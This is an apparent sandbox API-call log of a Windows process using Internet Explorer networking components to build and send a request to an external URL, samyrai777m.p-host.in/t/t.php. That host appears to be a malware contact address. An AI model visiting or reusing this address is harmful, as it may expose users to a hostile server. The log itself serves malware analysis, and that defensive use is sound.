[0063.697] IUnknown:QueryInterface (in: This=0x395140, riid=0x7fee0f20578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x2af4d0 | out: ppvObject=0x2af4d0*=0x395158) returned 0x0
[0063.698] IUriContainer:GetIUri (in: This=0x395158, ppIUri=0x2af520 | out: ppIUri=0x2af520*=0x3aee60) returned 0x0
[0063.698] IUnknown:Release (This=0x395158) returned 0x1
[0063.698] IUnknown:AddRef (This=0x395140) returned 0x2
[0063.698] IUnknown:AddRef (This=0x3aee60) returned 0x5
[0063.698] IMoniker:GetDisplayName (in: This=0x395140, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x2af2d0 | out: ppszDisplayName=0x2af2d0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.698] UrlGetLocationW (psz1="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.698] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppmk=0x2af260*=0x0, dwFlags=0x1 | out: ppmk=0x2af260*=0x395340) returned 0x0
[0063.698] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2af240 | out: ppURI=0x2af240*=0x3aee60) returned 0x0
[0063.698] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2af180 | out: pdwScheme=0x2af180*=0x2) returned 0x0
[0063.698] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0063.698] IUnknown:AddRef (This=0x3aee60) returned 0x9
[0063.698] IUri:GetAbsoluteUri (in: This=0x3aee60, pbstrAbsoluteUri=0x3bf290 | out: pbstrAbsoluteUri=0x3bf290*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.698] IUnknown:Release (This=0x3aee60) returned 0x8
[0063.698] IUnknown:AddRef (This=0x395340) returned 0x2
[0063.698] IUnknown:Release (This=0x395340) returned 0x1
[0063.698] IUnknown:AddRef (This=0x395140) returned 0x3
[0063.698] IUnknown:Release (This=0x395340) returned 0x0
[0063.698] IUnknown:AddRef (This=0x395140) returned 0x4
[0063.698] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aeea0 | out: ppvObject=0x2aeea0*=0x3aee60) returned 0x0
[0063.698] IUnknown:Release (This=0x3aee60) returned 0x6
[0063.699] IUnknown:AddRef (This=0x3aee60) returned 0x7
[0063.699] IUnknown:QueryInterface (in: This=0x395140, riid=0x7fee0f20578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x2aee40 | out: ppvObject=0x2aee40*=0x395158) returned 0x0
[0063.699] IUriContainer:GetIUri (in: This=0x395158, ppIUri=0x2aeee0 | out: ppIUri=0x2aeee0*=0x3aee60) returned 0x0
[0063.699] IUnknown:Release (This=0x395158) returned 0x4
[0063.699] IUnknown:AddRef (This=0x395140) returned 0x5
[0063.699] IUnknown:Release (This=0x395140) returned 0x4
[0063.699] IUnknown:AddRef (This=0x3aee60) returned 0x9
[0063.699] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aeea0 | out: ppvObject=0x2aeea0*=0x3aee60) returned 0x0
[0063.699] IUnknown:Release (This=0x3aee60) returned 0x9
[0063.699] IUnknown:AddRef (This=0x3aee60) returned 0xa
[0063.699] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2aeea0 | out: pdwScheme=0x2aeea0*=0x2) returned 0x0
[0063.699] GetCurrentProcessId () returned 0xbc0
[0063.699] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aeea0 | out: ppvObject=0x2aeea0*=0x3aee60) returned 0x0
[0063.699] IUnknown:Release (This=0x3aee60) returned 0xa
[0063.699] IUnknown:AddRef (This=0x3aee60) returned 0xb
[0063.701] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2aee70 | out: pdwScheme=0x2aee70*=0x2) returned 0x0
[0063.701] IUri:GetAbsoluteUri (in: This=0x3aee60, pbstrAbsoluteUri=0x2aee80 | out: pbstrAbsoluteUri=0x2aee80*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.702] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x7) returned 0x7fefde71020
[0063.702] SysStringLen (param_1="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x31
[0063.702] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2af280 | out: ppURI=0x2af280*=0x3aee60) returned 0x0
[0063.702] IUnknown:Release (This=0x3aee60) returned 0xb
[0063.702] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2aee10 | out: pdwScheme=0x2aee10*=0x2) returned 0x0
[0063.702] IUnknown:AddRef (This=0x3aee60) returned 0xc
[0063.702] IUri:GetPropertyDWORD (in: This=0x3aee60, uriProp=0x11, pdwProperty=0x2aebc8, dwFlags=0x0 | out: pdwProperty=0x2aebc8*=0x2) returned 0x0
[0063.702] IInternetSecurityManager:GetSecurityId (in: This=0x3c12b0, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pbSecurityId=0x2aec80, pcbSecurityId=0x2aec70*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2aec80*=0x68, pcbSecurityId=0x2aec70*=0x22) returned 0x0
[0063.832] IUnknown:Release (This=0x3aee60) returned 0xb
[0063.832] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2aee10 | out: ppu=0x2aee10) returned 0x0
[0063.832] GetDC (hWnd=0x0) returned 0x530107fa
[0063.832] CreateCompatibleBitmap (hdc=0x530107fa, cx=1, cy=1) returned 0x1f0508c3
[0063.832] GetDIBits (in: hdc=0x530107fa, hbm=0x1f0508c3, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x2ae9c0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x2ae9c0) returned 1
[0063.832] GetDIBits (in: hdc=0x530107fa, hbm=0x1f0508c3, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x2ae9c0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x2ae9c0) returned 1
[0063.832] DeleteObject (ho=0x1f0508c3) returned 1
[0063.832] GetSysColor (nIndex=0) returned 0xc8c8c8
[0063.832] GetSysColor (nIndex=1) returned 0x0
[0063.832] GetSysColor (nIndex=2) returned 0xd1b499
[0063.832] GetSysColor (nIndex=3) returned 0xdbcdbf
[0063.832] GetSysColor (nIndex=4) returned 0xf0f0f0
[0063.832] GetSysColor (nIndex=5) returned 0xffffff
[0063.832] GetSysColor (nIndex=6) returned 0x646464
[0063.832] GetSysColor (nIndex=7) returned 0x0
[0063.832] GetSysColor (nIndex=8) returned 0x0
[0063.832] GetSysColor (nIndex=9) returned 0x0
[0063.832] GetSysColor (nIndex=10) returned 0xb4b4b4
[0063.832] GetSysColor (nIndex=11) returned 0xfcf7f4
[0063.832] GetSysColor (nIndex=12) returned 0xababab
[0063.832] GetSysColor (nIndex=13) returned 0xff9933
[0063.832] GetSysColor (nIndex=14) returned 0xffffff
[0063.832] GetSysColor (nIndex=15) returned 0xf0f0f0
[0063.832] GetSysColor (nIndex=16) returned 0xa0a0a0
[0063.832] GetSysColor (nIndex=17) returned 0x6d6d6d
[0063.832] GetSysColor (nIndex=18) returned 0x0
[0063.832] GetSysColor (nIndex=19) returned 0x544e43
[0063.832] GetSysColor (nIndex=20) returned 0xffffff
[0063.832] GetSysColor (nIndex=21) returned 0x696969
[0063.832] GetSysColor (nIndex=22) returned 0xe3e3e3
[0063.832] GetSysColor (nIndex=23) returned 0x0
[0063.832] GetSysColor (nIndex=24) returned 0xe1ffff
[0063.832] GetSysColor (nIndex=25) returned 0x0
[0063.832] GetSysColor (nIndex=26) returned 0xcc6600
[0063.832] GetSysColor (nIndex=27) returned 0xead1b9
[0063.832] GetSysColor (nIndex=28) returned 0xf2e4d7
[0063.832] GetSysColor (nIndex=29) returned 0xff9933
[0063.833] GetSysColor (nIndex=30) returned 0xf0f0f0
[0063.833] GetSysColor (nIndex=31) returned 0x0
[0063.833] GetSysColor (nIndex=32) returned 0x0
[0063.833] GetSysColor (nIndex=33) returned 0x0
[0063.833] GetSysColor (nIndex=34) returned 0x0
[0063.833] GetSysColor (nIndex=35) returned 0x0
[0063.833] GetSysColor (nIndex=36) returned 0x0
[0063.833] GetSysColor (nIndex=37) returned 0x0
[0063.833] GetSysColor (nIndex=38) returned 0x0
[0063.833] GetSysColor (nIndex=39) returned 0x0
[0063.833] GetSysColor (nIndex=40) returned 0x0
[0063.833] GetSysColor (nIndex=41) returned 0x0
[0063.833] GetSysColor (nIndex=42) returned 0x0
[0063.833] GetSysColor (nIndex=43) returned 0x0
[0063.833] GetSysColor (nIndex=44) returned 0x0
[0063.833] GetSysColor (nIndex=45) returned 0x0
[0063.833] GetSysColor (nIndex=46) returned 0x0
[0063.833] GetSysColor (nIndex=47) returned 0x0
[0063.833] GetSysColor (nIndex=48) returned 0x0
[0063.833] GetSysColor (nIndex=49) returned 0x0
[0063.833] GetSysColor (nIndex=50) returned 0x0
[0063.833] GetSysColor (nIndex=51) returned 0x0
[0063.833] GetSysColor (nIndex=52) returned 0x0
[0063.833] GetSysColor (nIndex=53) returned 0x0
[0063.833] GetSysColor (nIndex=54) returned 0x0
[0063.833] GetSysColor (nIndex=55) returned 0x0
[0063.833] GetSysColor (nIndex=56) returned 0x0
[0063.833] GetSysColor (nIndex=57) returned 0x0
[0063.833] GetSysColor (nIndex=58) returned 0x0
[0063.833] GetSysColor (nIndex=59) returned 0x0
[0063.833] GetSysColor (nIndex=60) returned 0x0
[0063.833] GetSysColor (nIndex=61) returned 0x0
[0063.833] GetSysColor (nIndex=62) returned 0x0
[0063.833] GetSysColor (nIndex=63) returned 0x0
[0063.833] GetDeviceCaps (hdc=0x530107fa, index=38) returned 32409
[0063.833] ReleaseDC (hWnd=0x0, hDC=0x530107fa) returned 1
[0063.833] GetCurrentThreadId () returned 0xbc4
[0063.834] GetCursorPos (in: lpPoint=0x2aeb50 | out: lpPoint=0x2aeb50*(x=724, y=422)) returned 1
[0063.834] GetKeyState (nVirtKey=16) returned 0
[0063.834] GetKeyState (nVirtKey=17) returned 0
[0063.834] GetKeyState (nVirtKey=18) returned 0
[0063.834] GetKeyState (nVirtKey=160) returned 0
[0063.834] GetKeyState (nVirtKey=162) returned 0
[0063.834] GetKeyState (nVirtKey=164) returned 0
[0063.835] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x8) returned 0x7fefde713f0
[0063.835] GetCurrentThreadId () returned 0xbc4
[0063.835] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2aede0 | out: ppu=0x2aede0) returned 0x0
[0063.835] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2aeda0 | out: ppURI=0x2aeda0*=0x3aee60) returned 0x0
[0063.835] IUnknown:AddRef (This=0x3aee60) returned 0xd
[0063.835] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x39afb0) returned 0x800c0011
[0063.835] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.835] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.835] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0063.835] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x2700, pPolicy=0x2aed50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2aed50*=0x0) returned 0x0
[0063.835] IUnknown:Release (This=0x3aee60) returned 0xc
[0063.835] IUnknown:Release (This=0x3aee60) returned 0xb
[0063.835] IUnknown:AddRef (This=0x3aee60) returned 0xc
[0063.835] IUri:GetPropertyDWORD (in: This=0x3aee60, uriProp=0x11, pdwProperty=0x2aeb98, dwFlags=0x0 | out: pdwProperty=0x2aeb98*=0x2) returned 0x0
[0063.835] IInternetSecurityManager:GetSecurityId (in: This=0x3c12b0, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pbSecurityId=0x2aec30, pcbSecurityId=0x2aec20*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2aec30*=0x68, pcbSecurityId=0x2aec20*=0x22) returned 0x0
[0063.835] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x395448) returned 0x800c0011
[0063.836] IUnknown:Release (This=0x3aee60) returned 0xb
[0063.836] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x2aee60, dwReserved=0x0 | out: ppIInternetSession=0x2aee60*=0x3c4cd0) returned 0x0
[0063.836] IInternetSession:RegisterNameSpace (This=0x3c4cd0, pCF=0x7fee1044f60, rclsid=0x7fee0f21b30, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0063.837] IUnknown:AddRef (This=0x7fee1044f60) returned 0x1
[0063.837] IInternetSession:RegisterNameSpace (This=0x3c4cd0, pCF=0x7fee1044fa0, rclsid=0x7fee0f21b10, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0063.837] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0063.837] StrCmpICW (pszStr1="http://www.samyrai777m.p-host.in/t/t.php", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10
[0063.837] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aed50 | out: ppvObject=0x2aed50*=0x3aee60) returned 0x0
[0063.837] IUnknown:Release (This=0x3aee60) returned 0xb
[0063.837] IUnknown:AddRef (This=0x3aee60) returned 0xc
[0063.869] IUnknown:AddRef (This=0x3aee60) returned 0xd
[0063.869] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aecc0 | out: ppvObject=0x2aecc0*=0x3aee60) returned 0x0
[0063.869] IUnknown:Release (This=0x3aee60) returned 0xd
[0063.869] IUnknown:AddRef (This=0x3aee60) returned 0xe
[0063.869] IUnknown:Release (This=0x3aee60) returned 0xd
[0063.869] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2aedd0 | out: pdwScheme=0x2aedd0*=0x2) returned 0x0
[0063.869] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0063.870] IUnknown:AddRef (This=0x3aee60) returned 0xe
[0063.870] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aecc0 | out: ppvObject=0x2aecc0*=0x3aee60) returned 0x0
[0063.870] IUnknown:Release (This=0x3aee60) returned 0xe
[0063.870] IUnknown:AddRef (This=0x3aee60) returned 0xf
[0063.870] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2ae8b0 | out: ppvObject=0x2ae8b0*=0x3aee60) returned 0x0
[0063.870] IUnknown:Release (This=0x3aee60) returned 0xf
[0063.870] IUnknown:AddRef (This=0x3aee60) returned 0x10
[0063.870] IUnknown:AddRef (This=0x3aee60) returned 0x11
[0063.870] IUnknown:AddRef (This=0x3aee60) returned 0x12
[0063.870] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2ae880 | out: ppvObject=0x2ae880*=0x3aee60) returned 0x0
[0063.870] IUnknown:Release (This=0x3aee60) returned 0x12
[0063.870] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0063.871] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x3ef4a8 | out: pdwScheme=0x3ef4a8*=0x2) returned 0x0
[0063.871] IMoniker:IsSystemMoniker (in: This=0x395140, pdwMksys=0x2ae910 | out: pdwMksys=0x2ae910*=0x6) returned 0x0
[0063.871] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2ae8b0 | out: ppvObject=0x2ae8b0*=0x3aee60) returned 0x0
[0063.871] IUnknown:Release (This=0x3aee60) returned 0x13
[0063.871] IUnknown:AddRef (This=0x3aee60) returned 0x14
[0063.911] IInternetSession:CreateBinding (in: This=0x3c4cd0, pbc=0x0, szUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x3ee040, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x3ee040*=0x3f1080) returned 0x0
[0063.912] IUnknown:QueryInterface (in: This=0x3f1080, riid=0x7fee0f84860*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x2ae820 | out: ppvObject=0x2ae820*=0x0) returned 0x80004002
[0063.912] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae738 | out: phkResult=0x2ae738*=0x390) returned 0x0
[0063.912] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae740 | out: phkResult=0x2ae740*=0x394) returned 0x0
[0063.912] RegOpenKeyExW (in: hKey=0x394, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae6c8 | out: phkResult=0x2ae6c8*=0x0) returned 0x2
[0063.912] RegOpenKeyExW (in: hKey=0x390, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae6c8 | out: phkResult=0x2ae6c8*=0x398) returned 0x0
[0063.912] SHRegGetValueW () returned 0x2
[0063.912] SHRegGetValueW () returned 0x2
[0063.912] RegCloseKey (hKey=0x398) returned 0x0
[0063.912] RegCloseKey (hKey=0x0) returned 0x6
[0063.912] RegCloseKey (hKey=0x0) returned 0x6
[0063.912] RegCloseKey (hKey=0x390) returned 0x0
[0063.912] RegCloseKey (hKey=0x394) returned 0x0
[0063.912] IUnknown:AddRef (This=0x3f1080) returned 0x2
[0063.925] IUnknown:QueryInterface (in: This=0x3f1080, riid=0x7fee0fdb188*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x2ae850 | out: ppvObject=0x2ae850*=0x3f1080) returned 0x0
[0063.926] IInternetProtocolEx:StartEx (This=0x3f1080, pUri=0x3aee60, pOIProtSink=0x3ef370, pOIBindInfo=0x3ef300, grfPI=0x10, dwReserved=0x0) returned 0x0
[0063.926] IUnknown:AddRef (This=0x3ef370) returned 0x3
[0064.082] IInternetBindInfo:GetBindInfo (in: This=0x3ef300, grfBINDF=0x3f12a8, pbindinfo=0x3f12b0 | out: grfBINDF=0x3f12a8*=0x20083, pbindinfo=0x3f12b0) returned 0x0
[0064.082] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae648 | out: phkResult=0x2ae648*=0x3a8) returned 0x0
[0064.082] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae650 | out: phkResult=0x2ae650*=0x3ac) returned 0x0
[0064.082] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae5d8 | out: phkResult=0x2ae5d8*=0x0) returned 0x2
[0064.082] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x2ae5d8 | out: phkResult=0x2ae5d8*=0x0) returned 0x2
[0064.082] RegCloseKey (hKey=0x0) returned 0x6
[0064.082] RegCloseKey (hKey=0x0) returned 0x6
[0064.082] RegCloseKey (hKey=0x3a8) returned 0x0
[0064.082] RegCloseKey (hKey=0x3ac) returned 0x0
[0064.083] IUnknown:AddRef (This=0x3ef370) returned 0x5
[0064.083] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0
[0064.145] IInternetBindInfo:GetBindString (in: This=0x3ef300, ulStringType=0x2, ppwzStr=0x2ade80*=0x0, cEl=0x100, pcElFetched=0x2ae6b0*=0x100 | out: ppwzStr=0x2ade80*="*/*", pcElFetched=0x2ae6b0*=0x1) returned 0x0
[0064.145] CoTaskMemAlloc (cb=0x8) returned 0x3ae880
[0064.145] IUnknown:QueryInterface (in: This=0x3ef370, riid=0x7fefe4b1918*(Data1=0x58dfc7d0, Data2=0x5381, Data3=0x43e5, Data4=([0]=0x9d, [1]=0x72, [2]=0x4c, [3]=0xdd, [4]=0xe4, [5]=0xcb, [6]=0xf, [7]=0x1a)), ppvObject=0x2ae6c8 | out: ppvObject=0x2ae6c8*=0x0) returned 0x80004002
[0064.146] IUnknown:QueryInterface (in: This=0x3ef370, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x3f11b8 | out: ppvObject=0x3f11b8*=0x3ef2f0) returned 0x0
[0064.146] IServiceProvider:QueryService (in: This=0x3ef2f0, guidService=0x7fefe4af090*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4af090*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3f1410 | out: ppvObject=0x3f1410*=0x3ef2f8) returned 0x0
[0064.146] IHttpNegotiate:BeginningTransaction (in: This=0x3ef2f8, szUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", szHeaders="UA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate", dwReserved=0x0, pszAdditionalHeaders=0x2ad3a0 | out: pszAdditionalHeaders=0x2ad3a0*="Accept-Language: en-US\r\n") returned 0x0
[0064.146] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2ad260 | out: ppURI=0x2ad260*=0x3aee60) returned 0x0
[0064.146] IUnknown:AddRef (This=0x3aee60) returned 0x19
[0064.146] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2ad210 | out: ppvObject=0x2ad210*=0x3aee60) returned 0x0
[0064.146] IUnknown:Release (This=0x3aee60) returned 0x19
[0064.146] IUnknown:AddRef (This=0x3aee60) returned 0x1a
[0064.146] CoTaskMemAlloc (cb=0x32) returned 0x405520
[0064.147] IUnknown:Release (This=0x3aee60) returned 0x19
[0064.147] IServiceProvider:QueryService (in: This=0x3ef2f0, guidService=0x7fefe4af170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7fefe4af170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x3f1448 | out: ppvObject=0x3f1448*=0x3ef2f8) returned 0x0
[0064.147] IHttpNegotiate2:GetRootSecurityId (in: This=0x3ef2f8, pbSecurityId=0x2ad3f0, pcbSecurityId=0x3f13f0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2ad3f0*=0x0, pcbSecurityId=0x3f13f0*=0x200) returned 0x80004005
[0064.147] IUnknown:Release (This=0x3f1080) returned 0x4
[0064.147] IUnknown:Release (This=0x3aee60) returned 0x17
[0064.147] IUnknown:Release (This=0x3aee60) returned 0x16
[0064.147] IUnknown:Release (This=0x3aee60) returned 0x15
[0064.147] CoTaskMemFree (pv=0x0)
[0064.147] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2aec40 | out: lpCPInfo=0x2aec40) returned 1
[0064.147] IUnknown:AddRef (This=0x3c4cd0) returned 0x3
[0064.147] IUnknown:AddRef (This=0x3aee60) returned 0x16
[0064.147] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2aec80 | out: ppvObject=0x2aec80*=0x3aee60) returned 0x0
[0064.147] IUnknown:Release (This=0x3aee60) returned 0x16
[0064.147] IUnknown:AddRef (This=0x3aee60) returned 0x17
[0064.147] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2aecb0 | out: pdwScheme=0x2aecb0*=0x2) returned 0x0
[0064.147] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x210
[0064.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fee08905f0, lpParameter=0x3f31d0, dwCreationFlags=0x0, lpThreadId=0x3f31f0 | out: lpThreadId=0x3f31f0*=0x84c) returned 0x3d8
[0064.150] GetCurrentThreadId () returned 0xbc4
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x16
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x15
[0064.151] IUnknown:Release (This=0x395140) returned 0x3
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x14
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x13
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x12
[0064.151] IUnknown:Release (This=0x395140) returned 0x2
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x11
[0064.151] CoTaskMemFree (pv=0x39b640)
[0064.151] CoTaskMemFree (pv=0x0)
[0064.151] IUnknown:Release (This=0x3aee60) returned 0x10
[0064.151] CoTaskMemFree (pv=0x39b5d0)
[0064.151] GetClientRect (in: hWnd=0x101fa, lpRect=0x2af670 | out: lpRect=0x2af670) returned 1
[0064.151] GetClientRect (in: hWnd=0x101fa, lpRect=0x3c9078 | out: lpRect=0x3c9078) returned 1
